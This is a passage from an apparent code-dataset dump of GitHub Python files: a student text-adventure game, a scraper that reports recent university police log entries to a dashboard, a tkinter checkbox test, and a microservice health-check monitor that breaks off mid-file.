2, 1, 0, 0, 0, 10, 0],\n\t[\"something you really shouldn't be putting in your mouth\", -2, 0, 0, 0, 12,20, 0],\n\t[\"a pack of Fruit Gushers\", 2, 0, 0, 0, 0, 20, 0]\n]\n\nshieldid = 0 #current shielf\nshields = [\n\t#name #def increase\n\t[\"no shield\", 0],\n\t[\"a paper plate\", 1],\n\t[\"a paper bag\", 2],\n\t[\"last week's newpaper\",2],\n\t[\"a clipboard\", 2],\n\t[\"an umbrella\", 1],\n\t[\"a trash can lid\", 2],\n\t[\"a white board\",1],\n\t[\"a captain America shield\", 2]\n]\n\nswordid = 0 #current sword\nswords = [\n\t# name #attack increase\n\t[\"no weapon\", 0],\n\t[\"an unopened toothpick\", 2],\n\t[\"a spork from Wendy's\", 2],\n\t[\"a butterknife from Denny's\", 2],\n\t[\"a pack of unsharpened pencils bound with a rubberband\", 2],\n\t[\"a heavy switchblade that you don't know how to open\",1],\n\t[\"a large bag of expired candy\",1],\n\t[\"a baseball bat\", 3]\n]\n\nname = \"\"\n\nmapNum = 1\n\npassword = False\n\nTrash_Counter = 0\n\nenemies_in_worlds = [0,0,0,0,0,0,0] \n\ndef main():\n\tglobal mapNum, name, clear, player, map, worlds, triggersRaisin, getOutofHere, whereYouAt, wuhtChuWant, item_high, item_low, max_y, max_x, maxHP, currentHP, attack, defense, level, XP, items, shieldid, shields, swordid, swords\n\thighScoresHere()\n\tname = input(\"What's your name? : \")\n\tlogThatStuff(\"has started playing the game \")\n\n\ttrashGenerator()\n\t\n\t\n\tmapNum = 1\n\t\n\tmap = worlds[mapNum][:]\n\tweShouldAddSomeEnemies()\n\tdrawMap() #draws map original instance\n\n\twhile not exit:\n\t\treadKeyStrokes()\n\t\t\ndef readKeyStrokes():\n\tglobal player, wuhtChuWant, whereYouAt, password\n\n\tcurrentx = player[0]\n\tcurrenty = player[1]\n\t\n\tif keyboard.is_pressed('d') and not defineWalls(getTileAt(player[0] + 1, player[1])): #allows movement to the right if d is pressed and there is no barrier \n\t\tplayer[0] += 1\n\t\t\n\tif keyboard.is_pressed('a') and not defineWalls(getTileAt(player[0] - 1, player[1])): #allows movement to the left if a is pressed and there is no barrier \n\t\tplayer[0] -= 1\n\t\t\n\tif keyboard.is_pressed('w') and not defineWalls(getTileAt(player[0], player[1] - 1)): #allows movement up if w is pressed and there is no barrier \n\t\tplayer[1] -= 1\n\t\t\n\tif keyboard.is_pressed('s') and not defineWalls(getTileAt(player[0], player[1] + 1)): #allows movement down if s is pressed and there is no barrier \n\t\tplayer[1] += 1\n\t\n\tif not keyboard.is_pressed('d') and not keyboard.is_pressed('a') and not keyboard.is_pressed('w') and not keyboard.is_pressed('a'):\n\t\tomNomTheNomNoms()\n\t\n\tif player[0] != currentx or player[1] != currenty:\n\t\tthetypeofbadguywearefacing = isThereABADGUYhere(player[0],player[1])\n\t\tif thetypeofbadguywearefacing >= 0:\n\t\t\tplayer[0] = currentx\n\t\t\tplayer[1] = currenty\n\t\t\ttimeToFight(thetypeofbadguywearefacing)\n\t\t\ttime.sleep(1/2)\n\t\telse:\n\t\t\tif newRoom(getTileAt(player[0], player[1])) == -1:\n\t\t\t\twhereYouAt = False\n\t\t\twuhtChuWant = False\n\t\thesGonnaGetChu()\n\t\tdrawMap()\n\t\n\tif wuhtChuWant == False and getTileAt(player[0], player[1]) == \"+\": #allows player to pick up an item or leave it. If picked up it is removed from the board\n\t\tstatus = \"You found an item! (press space)\" #I did it for aesthetics\n\t\tprint(status)\n\t\twhile True:\n\t\t\tif keyboard.is_pressed(' '):\n\t\t\t\tbreak\n\t\tstatus = \"Would you like to pick it up? (Y or N)\"\n\t\tprint(status)\n\t\t\n\t\tgiveRandomItem()\n\t\t\n\t\n\tif wuhtChuWant == False and getTileAt(player[0], player[1]) == \"x\": #This mimicks picking up an item, but it's a key item -- the password\n\t\tstatus = \"You found an item! (press space)\" #I did it for aesthetics\n\t\tprint(status)\n\t\twhile True:\n\t\t\tif keyboard.is_pressed(' '):\n\t\t\t\tbreak\n\t\tstatus = \"Would you like to pick it up? (Y or N)\"\n\t\tprint(status)\n\t\tpassword = thePasswordIsInWorld4()\n\t\t\n\t\n\t\t\n\tcheckForPizzaPlace()\n\n\tloadMap(newRoom(getTileAt(player[0], player[1])))\n\ndef trashGenerator():\n\tglobal worlds, mapNum, item_low, item_high, map \n\tfor world in range(len(worlds)):\n\t\tnumitems = random.randint(item_low,item_high) \n\t\tmapNum = world\n\t\tmap = worlds[mapNum][:]\n\t\tfor _ in range(numitems): #this bit of code decides how much trash will be on each level and then it puts it on the map at a random x/y coordinate that is also not a wall ect\n\t\t\twhile True:\n\t\t\t\titemx = random.randint(0, max_x-1)\n\t\t\t\titemy = random.randint(0, max_y-1)\n\t\t\t\tif getTileAt(itemx, itemy) == \".\":\n\t\t\t\t\tworlds[world] = placeCharacter(\"+\", itemx, itemy, worlds[world])\n\t\t\t\t\tbreak\n\t\tif mapNum == 4:\n\t\t\twhile True:\n\t\t\t\titemx = random.randint(0, max_x-1) #This does the same thing, but only in world 4 after a certain x/y coordinate. This randomly generates the location of the password\n\t\t\t\titemy = random.randint(0, max_y-1)\n\t\t\t\tif itemx>20 and itemy>4:\n\t\t\t\t\tif getTileAt(itemx, itemy) == \".\":\n\t\t\t\t\t\tworlds[world] = placeCharacter(\"x\", itemx, itemy, worlds[world])\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\ndef giveRandomItem():\n\tglobal items, swords, shields, swordid, shieldid, attack, defense, wuhtChuWant, Trash_Counter\n\twhile True:\n\t\tif keyboard.is_pressed('y'):\n\t\t\tthing = generateItem()\n\t\t\tif thing >= 0: #this is a consumeable item\n\t\t\t\tprint(\"You found \" + items[thing][0] + \". You can put this in your mouth!\") \n\t\t\t\titems[thing][7] = (items[thing][7]+1) #adds to inventory\n\t\t\t\tlogThatStuff(\"has picked up a consumeable item \")\n\t\t\telif thing == -1:\n\t\t\t\tif swordid < len(swords)-1: #this is a sword\n\t\t\t\t\tswordid += 1 #upgrades your sword\n\t\t\t\t\tprint(\"You found \" + swords[swordid][0] + \"! You can swing this like a sword!\")\n\t\t\t\t\tprint(\"You increased your attack by \" + str(swords[swordid][1]) + \".\")\n\t\t\t\t\tattack += swords[swordid][1] #upgrades your attack\n\t\t\t\t\tlogThatStuff(\"has picked up a sword \")\n\t\t\t\telse: \n\t\t\t\t\tthing = -89\n\t\t\telif thing != -89: #this is a shield \n\t\t\t\tif shieldid < len(shields)-1:\n\t\t\t\t\tshieldid += 1 #upgrades shield\n\t\t\t\t\tprint(\"You found \" + shields[shieldid][0] + \"! You can use this as a shield!\")\n\t\t\t\t\tprint(\"You increased your defense by \" + str(shields[shieldid][1]) + \".\")\n\t\t\t\t\tdefense += shields[shieldid][1] #upgrades defense\n\t\t\t\t\tlogThatStuff(\"has picked up a shield \")\n\t\t\t\telse:\n\t\t\t\t\tthing = -89\n\t\t\tif thing == -89:\n\t\t\t\ta = random.randint(0,11)\n\t\t\t\tTrash_Counter +=1 #this counts how much garbage you've encountered \n\t\t\t\tprint(\"Oh... It's just \" + [\"a used napkin. It's got a mustard stain\",\"an empty video game case. Wish there was something to play\",\"a broken bottle. Looks sort of like dad's\", \"a plastic cup. There's still coffee in it\",\"a battery. Something is oozing out of it\", \"an entire tire. I can't carry this\",\"a burnt cigarette. My teacher said not to touch this\",\"a match box. It is empty though..\",\"a used bottle rocket. Who shot this off..\",\"a 10 piece mcNugget! It's empty..\",\"a plastic spoon. It's melted on the bottom\", \"a crumpled up piece of paper. It reads Ev__t_on N_t_ce. You can't quite make it out\"][a] + \". Better put it back.\")\n\t\t\tplaceCharacter(\".\", player[0], player[1], worlds[mapNum])\n\t\t\tplaceCharacter(\".\", player[0], player[1], map)\n\t\t\tlogThatStuff(\"has picked up trash ... and put back down \") \n\t\t\tbreak\n\t\tif keyboard.is_pressed('n'):\n\t\t\twuhtChuWant = True\n\t\t\tdrawMap()\n\t\t\tbreak\n\t\t\t\t\t\ndef couldBeAWallFam():\n\treturn\t\n\ndef logThatStuff(whatHappened): #creates a log of when characters do things\n\tglobal name\n\tfile = open(\"Log.txt\", \"a+\")\n\tfile.write(\"\\n\" + name + \" \"+ whatHappened + \" at \" + str(datetime.now()))\n\t\n\ndef replaceNth(row, index, replacement):\n\treturn row[:(index-1)] + replacement + row[(index):]\n\ndef getTileAt(x, y):\n\tglobal max_x, max_y\n\tif x < 0 or y < 0 or x > max_x or y > max_y:\n\t\treturn \"#\"\n\treturn map[y][x-1] #returns character that is one tile next to the player's current location. Direction determined by arguments.\n\ndef loadMap(newWorld):\n\tglobal map, mapNum, whereYouAt\n\tif newWorld == -1 or whereYouAt == True:\n\t\treturn\n\telse: #this puts you on a new map\n\t\twhereWeWereAMomentAgo = mapNum \n\t\tmapNum = newWorld\n\t\tmap = worlds[newWorld][:]\n\t\tfor grape in range(len(triggersRaisin)): #This is a joke. It's an array within an array. I decided those are called raisins \n\t\t\tif triggersRaisin[grape][0] == whereWeWereAMomentAgo and triggersRaisin[grape][1] == newWorld: \n\t\t\t\tplayer[0] += triggersRaisin[grape][2]\n\t\t\t\tplayer[1] += triggersRaisin[grape][3]\n\t\t\t\tbreak\n\t\t\tif triggersRaisin[grape][1] == whereWeWereAMomentAgo and triggersRaisin[grape][0] == newWorld:\n\t\t\t\tplayer[0] -= triggersRaisin[grape][2]\n\t\t\t\tplayer[1] -= triggersRaisin[grape][3]\n\t\t\t\tbreak\n\t\tlogThatStuff(\"entered into world \" + str(worlds[newWorld]))\n\t\tweShouldAddSomeEnemies()\n\t\tdrawMap()\n\t\twhereYouAt = True\n\t\t\ndef drawUI(): #this is the stuff the player sees under the map and is interactable \n\tglobal status, maxHP, currentHP\n\tif currentHP > maxHP/2:\n\t\tstatus = \"\\nStatus: Let's go on an adventure!\"\n\tif currentHP == maxHP/2:\n\t\tstatus = \"\\nStatus: Just a little longer. You're doing great!\"\n\tif currentHP < maxHP/2:\n\t\tstatus = \"\\nStatus: You don't feel so good.\"\n\tif currentHP == 1:\n\t\tstatus = \"\\nStatus: !!!!!!!!!!!!\"\n\tglobal attack, defense, level, XP, swordid, swords, shieldid, shields\n\tprint( \"Level: \" + str(level) + \" -- Current HP: \" + str(currentHP) +\"/\" + str(maxHP)+ \" -- Current Attack: \" + str(attack) + \" -- Current Defense: \" + str(defense) + \" -- Current XP: \" + str(XP) )\n\tprint(status)\n\tprint(\"\\nWeapon: \" + swords[swordid][0])\n\tprint(\"Shield: \" + shields[shieldid][0] + \"\\n\")\n\t\n\t\t#do this before and after inventory block but only when items exist -- print(\"******************************************************************************************************************** \\n\")\n\tindividualtypesofitem = 0\n\tfor _ in range(len(items)): #this adds items and sees how many types of items you have\n\t\tif items[_][7] > 0:\n\t\t\tindividualtypesofitem += 1\n\t\t\tprint(\"[\" + str(individualtypesofitem) + \"] \" + str(items[_][0]) + \" (\" + str(items[_][7]) + \"x)\")\n\t\t\t\n\tif password is True:\n\t\tprint(\"A scrap of paper\")\n\t\ndef placeCharacter(character, xCoor, yCoor, display): \n\tdisplay[yCoor] = replaceNth(display[yCoor], xCoor, character) #places character on map\n\treturn display #returns map with character placed on it\n\t\ndef drawMap():\n\tglobal player, mapNum\n\tclear() #clears map\n\tdisplay = map[:] #copies map to display\n\t\n\tfor trigger in range(len(getOutofHere)):\n\t\tfor row in range(len(display)): #feeds rows to display to read\n\t\t\tdisplay[row] = display[row].replace(getOutofHere[trigger], \".\") #makes loading zones look like floor!!\n\t\t\tdisplay[row] = display[row].replace(\"x\", \"+\") #replaces password with trash symbol\n\t\t\t\n\tfor monster in range(len(enemies_currently_generated)):\n\t\tif enemies_currently_generated[monster][4] == mapNum and enemies_currently_generated[monster][1] >= 0:\n\t\t\tdisplay = placeCharacter(enemies_currently_generated[monster][2], enemies_currently_generated[monster][0], enemies_currently_generated[monster][1], display)\n\t\n\tdisplay = placeCharacter(\"@\", player[0], player[1], display) \t\t\t\n\tfor row in range(len(display)): \n\t\tprint(display[row]) #prints display\n\tdrawUI()\n\t\n\ttime.sleep(.085)#delays input receptor so that character moves naturally\n\t\ndef defineWalls(tile):\n\tnotQuiteMap = [\"#\",\"~\",\">\",\" \",\"[\"]\n\treturn tile in notQuiteMap #returns true if it's a wall\n\ndef isThereABADGUYhere(checkx, checky):\n\tfor BAADGUY in range(len(enemies_currently_generated)):\n\t\tif enemies_currently_generated[BAADGUY][0] == checkx and enemies_currently_generated[BAADGUY][1] == checky and enemies_currently_generated[BAADGUY][4] == mapNum:\\\n\t\t\treturn BAADGUY-0\n\treturn -1\n\ndef hesGonnaGetChu():\n\tglobal enemies_currently_generated, player\n\tfor he in range(len(enemies_currently_generated)):\n\t\tif enemies_currently_generated[he][4] == mapNum and enemies_currently_generated[he][2] != \"L\" and enemies_currently_generated[he][1] >= 0:\n\t\t\tif (enemies_currently_generated[he][0] == player[0] and abs(enemies_currently_generated[he][1] - player[1]) <= 1) or (enemies_currently_generated[he][1] == player[1] and abs(enemies_currently_generated[he][0] - player[0]) <= 1):\n\t\t\t\touchThatHurt(he)\n\t\t\t\ttime.sleep(1/3)\n\t\t\telse:\n\t\t\t\ttries = 100\n\t\t\t\twhile tries > 0:\n\t\t\t\t\tnotOk = False\n\t\t\t\t\tdirectionHeWantToGo = random.randint(1,4)\n\t\t\t\t\ttileHeWantToGoToX = enemies_currently_generated[he][0]\n\t\t\t\t\ttileHeWantToGoToY = enemies_currently_generated[he][1]\n\t\t\t\t\tif directionHeWantToGo == 1:\n\t\t\t\t\t\ttileHeWantToGoToX -= 1\n\t\t\t\t\tif directionHeWantToGo == 2:\n\t\t\t\t\t\ttileHeWantToGoToX += 1\n\t\t\t\t\tif directionHeWantToGo == 3:\n\t\t\t\t\t\ttileHeWantToGoToY -= 1\n\t\t\t\t\tif directionHeWantToGo == 4:\n\t\t\t\t\t\ttileHeWantToGoToY += 1\n\t\t\t\t\tfor otherHe in range(len(enemies_currently_generated)):\n\t\t\t\t\t\tif enemies_currently_generated[otherHe][0] == tileHeWantToGoToX and enemies_currently_generated[otherHe][1] == tileHeWantToGoToY and enemies_currently_generated[otherHe][4] == mapNum:\n\t\t\t\t\t\t\tnotOk = True\n\t\t\t\t\tif not notOk and getTileAt(tileHeWantToGoToX,tileHeWantToGoToY) == \".\" or getTileAt(tileHeWantToGoToX,tileHeWantToGoToY) == \"+\" and tileHeWantToGoToX != player[0] and tileHeWantToGoToY != player[1]:\n\t\t\t\t\t\tenemies_currently_generated[he][0] = tileHeWantToGoToX\n\t\t\t\t\t\tenemies_currently_generated[he][1] = tileHeWantToGoToY\n\t\t\t\t\t\ttries = 0\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\ttries -= 1\n\t\ndef newRoom(tile):\n\tif tile in getOutofHere:\n\t\treturn getOutofHere.index(tile) #returns true if this tile exists\n\telse:\n\t\treturn -1\n\t\t\ndef checkForPizzaPlace(): #this function should see if the next tile is [\n\tglobal exit, player, level\n\tif getTileAt(player[0]-1, player[1]) == \"[\" and password is True:\n\t\tclear()\n\t\tprint(\"Do you have the password? ..... You do! \\n Welcome to Paulie's Pizza. Your cousin's party started 30 minutes ago! Where have you been! \\nAt least you had a good time along the way.\" )\n\t\tif level > 1:\n\t\t\tprint(\"You're already level \" + str(level) + \". Wow!\")\n\t\telse:\n\t\t\tprint(\"...You're only level \" + str(level) + \". How did you even get here??\")\n\t\tprint(\"\\n \\n \\n \\n\")\n\t\tprint(\"Y O U W O N\")\n\t\tprint(\"(You can leave now (Press Z))\")\n\t\tlogThatStuff(\"won the game \")\n\t\tsubmitScore()\n\t\thighScoresHere()\n\t\twhile not keyboard.is_pressed('z'): #This makes the map stop being interactable\n\t\t\tcontinue\n\t\texit = True\n\t\t\n\t\n\telif getTileAt(player[0]-1,player[1]) == \"[\" and password is False: #if you don't have the password, it tells you to leave\n\t\tclear()\n\t\tprint(\"Do you have the password? ..... Nah. Doesn't look like it. Beat it, kid.(.... Press 'd' to beat it I guess)\")\n\n\t\t\n\t\t\ndef highScoresHere(): #this prints out the scores in the database using PHP script\n\tprint(urllib.request.urlopen(\"http://localhost/\").read().decode())\n\ndef submitScore(): #this adds your score to the database\n\tglobal name, level, Trash_Counter\n\tprint(urllib.request.urlopen(\"http://localhost/?name=\" + name.replace(\" \",\"_\").replace(\"&\",\"_\") + \"&level=\" + str(level) + \"&trash=\" + str(Trash_Counter)).read().decode())\n\n#def whatsThePassword(): #this function should see if the password paper is in your inventory\n\ndef thePasswordIsInWorld4(): #this is what plays if you find the password and it reads it in your inventory once found\n\tglobal password, wuhtChuWant\n\twhile True:\n\t\tif keyboard.is_pressed('y'):\n\t\t\tlogThatStuff(\"has found the password \")\n\t\t\ta = random.randint(0,9)\n\t\t\tprint(\"You found a scrap piece of paper! It has the word \" +[\"Herby fully loaded\", \"toothbrush\", \"swanky\", \"swiggity swizza gotta get that pizza\", \"something you can't pronounce\", \"OHHHH YEAHHHHHHH\", \"jeepers creepers who's got the pizzers\", \"Are you done yet?\", \"Open sesame\", \"Honey I'm home\"][a]\t+ \" scribbled on it.\")\n\t\t\tpassword = True \n\t\t\tplaceCharacter(\".\", player[0], player[1], worlds[mapNum])\n\t\t\tplaceCharacter(\".\", player[0], player[1], map)\n\t\t\tbreak\n\t\tif keyboard.is_pressed('n'):\n\t\t\tlogThatStuff(\"didn't pick up the password?? \")\n\t\t\twuhtChuWant = True\n\t\t\tdrawMap()\n\t\t\tbreak\n\t\n\treturn password\n\t\ndef didYouDie(HPNow): #this checks your HP. We call this after consuming items and during battle so it kills you if you die\n\tglobal exit\n\tif HPNow <= 0:\n\t\tclear()\n\t\tcolor()\n\t\tprint(\"G A M E O V E R\")\n\t\tsubmitScore()\n\t\tlogThatStuff(\"died... \")\n\t\twhile not keyboard.is_pressed('z'):\n\t\t\tcontinue\n\t\texit = True\n\t\t\n\t\t\ndef generateItem(): #sword is -1, shield -2, item -3, piece of trash -89\n\twhatKindofStuff = random.randint(0,5) #we use this extra function in conjunction with the one that reads the trash because it allows us to manipulate the probability and looks cleaner\n\tif whatKindofStuff == 1:\n\t\treturn -1\n\telif whatKindofStuff == 2:\n\t\treturn -89\n\telif whatKindofStuff == 3:\n\t\treturn -2\n\telse:\n\t\tquoteunquoteTREASURE = []\n\t\tfor target in range(len(items)):\n\t\t\tfor _ in range(items[target][6]):\n\t\t\t\tquoteunquoteTREASURE.append(target)\n\t\ttrashroulette = random.randint(0, len(quoteunquoteTREASURE)-1)\n\t\treturn quoteunquoteTREASURE[trashroulette]\n\t\t\t#name #HP increase #attack increase #defense increase #level increase #XP increase #rarity #quantity\n\t\t\t\ndef levelUp():\n\tglobal level, XP, attack, defense, maxHP, currentHP\n\tif XP >= 100:\n\t\tXP = XP -100 #this reads how much XP you have and levels you up if it's over 100 \n\t\tincrease_amount = random.randint(0,3) #this decides how many of your stats will increase\n\t\tif increase_amount > 0:\n\t\t\tfor x in range(increase_amount): #this decides which stat will increase\n\t\t\t\twhich_stat =random.randint(0,2)\n\t\t\t\tif which_stat == 0: #this increases HP\n\t\t\t\t\tmaxHP = maxHP + random.randint(2,12)\n\t\t\t\t\tprint(\"You improved your HP!\")\n\t\t\t\telif which_stat == 1: #this increases attack\n\t\t\t\t\tattack = attack + random.randint(1,3)\n\t\t\t\t\tprint(\"You improved your attack!\")\n\t\t\t\telse:\n\t\t\t\t\tdefense = defense + random.randint(1,3) #this increases defense\n\t\t\t\t\tprint(\"You improved your defense!\")\n\t\tcurrentHP = maxHP #when you level up you're revived to max health\n\t\tlevel +=1\n\t\tdrawMap()\n\t\tlogThatStuff(\"leveled up \")\n\t\t\ndef weShouldAddSomeEnemies(): #adds enemies to the world\n\tglobal enemies, enemies_in_worlds, mapNum, max_x, max_y\n\tif enemies_in_worlds[mapNum] == 0:\n\t\thowMany = random.randint(1,5)\n\t\tfor x in range(howMany):\n\t\t\twhile True:\n\t\t\t\tbadguyx = random.randint(0, max_x-1)\n\t\t\t\tbadguyy = random.randint(0, max_y-1)\n\t\t\t\tif getTileAt(badguyx, badguyy) == \".\" or getTileAt(badguyx, badguyy) == \"+\":\n\t\t\t\t\tmonsterrarity = []\n\t\t\t\t\tfor target in range(len(enemies)):\n\t\t\t\t\t\tfor _ in range(enemies[target][5]):\n\t\t\t\t\t\t\tmonsterrarity.append(enemies[target][6])\n\t\t\t\t\tbadguyroulette = monsterrarity[random.randint(0, len(monsterrarity)-1)]\n\t\t\t\t\t#print(badguyroulette)\n\t\t\t\t\t#time.sleep(1)\n\t\t\t\t\tthisguysHP = 0\n\t\t\t\t\tthisguysSymbol = \"*\"\n\t\t\t\t\tfor enemytype in range(len(enemies)):\n\t\t\t\t\t\tif enemies[enemytype][6] == badguyroulette:\n\t\t\t\t\t\t\tthisguysHP = enemies[enemytype][1]\n\t\t\t\t\t\t\tthisguysSymbol = enemies[enemytype][7]\n\t\t\t\t\t\t\tthisguysType = enemies[enemytype][6]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tenemies_currently_generated.append([badguyx,badguyy,thisguysType,thisguysHP,mapNum,thisguysSymbol])\n\t\t\t\t\tenemies_in_worlds[mapNum] += 1\n\t\t\t\t\tbreak\n\ndef isItDead(guy): #checks if enemy is dead\n\tglobal enemies_currently_generated, enemies, XP, mapNum\n\ttype = -1\n\tfor x in range(len(enemies)):\n\t\tif enemies[x][6] == enemies_currently_generated[guy][2]:\n\t\t\ttype = x\n\t\t\tbreak\n\tif enemies_currently_generated[guy][3] <= 0:\n\t\tenemies_in_worlds[mapNum] -= 1\n\t\tdel enemies_currently_generated[guy]\n\t\tXP += enemies[type][4]\n\t\tlevelUp()\n\t\tlogThatStuff(\" has killed an enemy \")\n\t\t\ndef timeToFight(guy):\n\tglobal currentHP, attack, enemies_currently_generated, enemies\n\ttype = -1\n\tfor x in range(len(enemies)):\n\t\tif enemies[x][6] == enemies_currently_generated[guy][2]:\n\t\t\ttype = x\n\t\t\tbreak\n\tprint(\"A \" + str(enemies[type][0]) + \" is in your way. Beat them up!\")\n\tenemies_currently_generated[guy][3] -= attack -enemies[type][3]\n\tisItDead(guy)\n\ttime.sleep(1.5)\n\tdrawMap()\n\t\n\t\ndef ouchThatHurt(guy):\n\tglobal currentHP, attack, enemies_currently_generated, enemies\n\ttype = -1\n\tfor x in range(len(enemies)):\n\t\tif enemies[x][6] == enemies_currently_generated[guy][2]:\n\t\t\ttype = x\n\t\t\tbreak\n\tprint(\"A \" + enemies[type][0] + \" attacked you!\")\n\tcurrentHP -= max(enemies[type][2] - random.randint(0,defense), 0)\n\tprint(\"You lost HP!\")\n\tdidYouDie(currentHP)\n\ttime.sleep(1)\n\tdrawMap()\n\n\t\ndef omNomTheNomNoms():\n\tglobal items, currentHP, maxHP, attack, defense, level, XP\n\tthenumberoftypesofitemsthatwehaveavailableatthemoment = 0\n\tfor f in range(len(items)): #this figures out how many items we have\n\t\tif items[f][7] > 0: #if you have more than one in your inventory\n\t\t\tthenumberoftypesofitemsthatwehaveavailableatthemoment += 1 #add it to how many types of items we have\n\t\t\tif keyboard.is_pressed(str(thenumberoftypesofitemsthatwehaveavailableatthemoment)): #this checks the number associated with the item. An \"ID\" if you will \n\t\t\t\tcurrentHP += items[f][1] #affects HP\n\t\t\t\thesGonnaGetChu()\n\t\t\t\tif currentHP > maxHP:\n\t\t\t\t\tcurrentHP = maxHP #makes sure you can't go over max HP\n\t\t\t\tattack += items[f][2] #affects attack\n\t\t\t\tdefense += items[f][3] #affects defense\n\t\t\t\tlevel += items[f][4] #affects level\n\t\t\t\tXP += items[f][5] #affects XP\n\t\t\t\titems[f][7] -= 1 #decreases one from your inventory\n\t\t\t\tdrawMap()\n\t\t\t\tprint(\"You ate it! Check out your stats!\") #generic print message\n\t\t\t\tlevelUp() #checks to see if you leveled up \n\t\t\t\tdidYouDie(currentHP) #checks if you died\n\t\t\t\ttime.sleep(.2)\n\t\t\t\tlogThatStuff(\"ate an item \")\n\nmain()\n\n# cd Desktop/Python Files/Final 2","repo_name":"Judas-Michael/DetroitTheGame","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":28961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24974327118","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, timedelta\nfrom yattag import Doc\nimport dashboard\nSLASH_CODE = f'%2F'\n\ncrime_table = None\n\noffset = 0\nresults_found = False\nwhile results_found == False:\n try:\n #Try finding table results for past 7 days, if nothing then IndexError\n end_date = datetime.now() - timedelta(days=7 * offset)\n start_date = end_date - timedelta(days=7 * (offset + 1))\n end_date_url = end_date.strftime('%Y/%#m/%#d').replace('/', SLASH_CODE)\n start_date_url = start_date.strftime('%Y/%#m/%#d').replace('/', SLASH_CODE)\n url = f'https://oupolice.com/clery/activity-log/?crimemonth={start_date_url}&crimemonth2={end_date_url}'\n print(f'[crimes] Getting activity for {start_date.strftime(\"%#m/%#d/%Y\")} - {end_date.strftime(\"%#m/%#d/%Y\")}')\n print(f'[crimes] Querying: {url}')\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n crime_table = soup.find_all('table', {'class': 'crimetable'})[0]\n results_found = True\n except IndexError as e:\n #Need to go back another week\n results_found = False\n offset += 1\n\nheading = crime_table.find_all('tr')[0]\ncrime_rows = crime_table.find_all('tr')[1:]\nmost_recent_five = crime_rows[-5:]\n\nprint('[crimes] Writing HTML...')\ndoc, tag, text = Doc().tagtext()\nwith tag('p'):\n text('5 most recent activity entries reported by OUPD:')\nwith tag('table', klass='table table-striped table-hover'):\n with tag('tbody'):\n with tag('tr'):\n with tag('th'):\n text('Reported')\n with tag('th'):\n text('Nature')\n with tag('th'):\n text('Address')\n for row in most_recent_five:\n crime_info = row.find_all('td')\n reported = crime_info[2].text.strip()\n nature = crime_info[1].text.strip()\n address = crime_info[4].text.strip()\n with tag('tr'):\n with tag('td'):\n text(reported)\n with tag('td'):\n text(nature)\n with tag('td'):\n text(address)\nhtml = doc.getvalue()\nprint('[crimes] Posting to widget...')\npost = dashboard.post_to_widget('crimes', html)\nprint(post)","repo_name":"PhysCorp/Dashboard.LOL","sub_path":"python/widgets/crimes.py","file_name":"crimes.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27270252982","text":"import tkinter as tk\n \nwindow = tk.Tk()\nwindow.title('My Window')\nwindow.geometry('300x300')\ngoods = {\"Рыба\":100}\n \nl = tk.Label(window, bg='white', width=20, text='empty')\nl.pack()\n\n \ndef sum_up(value):\n\tl.text=value;\n\nvar1 = tk.IntVar()\nvar2 = tk.IntVar()\nc1 = tk.Checkbutton(window, text='Рыба',variable=var1, onvalue=1, offvalue=0, command=sum_up(goods['Рыба']))\nc1.pack()\n\nframe = tk.Frame(window, width = 100, height = 100)\nframe.bind(\"\", sum_up)\nframe.pack()\nprint(var1)\n\nwindow.mainloop()\n","repo_name":"mimilasyxa/python","sub_path":"lab3/1_2.py","file_name":"1_2.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13548382691","text":"from typing import Any\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask_jwt_extended import jwt_required, create_access_token, get_jwt_identity\nimport time\nfrom random import randrange\nimport logging\nimport sys\nimport requests\nimport signal\nimport sys\nfrom threading import Thread\nfrom datetime import datetime, timedelta\n\nclass Llamadas():\n\n def llamarMicroservicio1(e, microservicio): \n\n fallo1 = None\n fallo2 = None \n fallo3 = None\n\n loggerName = 'MonitorMicroservicio1'\n urlMicroservicio = 'https://microservicio-uno-grupo5.herokuapp.com/registropaciente/ping'\n if(microservicio == 2): \n loggerName = 'MonitorMicroservicio2'\n urlMicroservicio = 'https://microservicio-dos-grupo5.herokuapp.com/registropaciente/ping'\n else:\n if(microservicio == 3):\n loggerName = 'MonitorMicroservicio3'\n urlMicroservicio = 'https://microservicio-tres-grupo5.herokuapp.com/registropaciente/ping'\n \n # create logger\n logger = logging.getLogger(loggerName)\n logger.setLevel(logging.DEBUG)\n logger.flush = sys.stdout.flush\n\n # create console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')\n\n # add formatter to ch\n ch.setFormatter(formatter)\n\n # add ch to logger\n logger.addHandler(ch)\n\n\n inicio = datetime.now()\n fin = datetime.now() + timedelta(seconds=180)\n while fin > datetime.now():\n fallo = None\n try:\n r = requests.get(urlMicroservicio, timeout=10)\n if(r.status_code != 200):\n logger.debug('Error en microservicio #' + str(microservicio) + ' Código respuesta: '+ str(r.status_code) )\n fallo = datetime.now() \n except:\n logger.debug('Error en microservicio #' + str(microservicio) + ': timeout' )\n fallo = datetime.now()\n if(fallo != None):\n limiteInferior = fallo - timedelta(seconds=20)\n limiteSuperior = fallo\n fallosEnRango = 1\n if(fallo1 == None):\n fallo1 = fallo\n fallo = None\n else:\n if(fallo1 < limiteInferior or fallo1 > limiteSuperior):\n fallo1 = fallo\n fallo = None\n else:\n fallosEnRango = fallosEnRango + 1\n if(fallo2 == None):\n fallo2 = fallo\n fallo = None\n else:\n if(fallo2 < limiteInferior or fallo2 > limiteSuperior):\n fallo = fallo\n fallo = None\n else:\n fallosEnRango = fallosEnRango + 1\n if(fallo3 == None):\n fallo3 = fallo\n fallo = None\n else:\n if(fallo3 < limiteInferior or fallo3 > limiteSuperior):\n fallo3 = fallo\n fallo = None\n else:\n fallosEnRango = 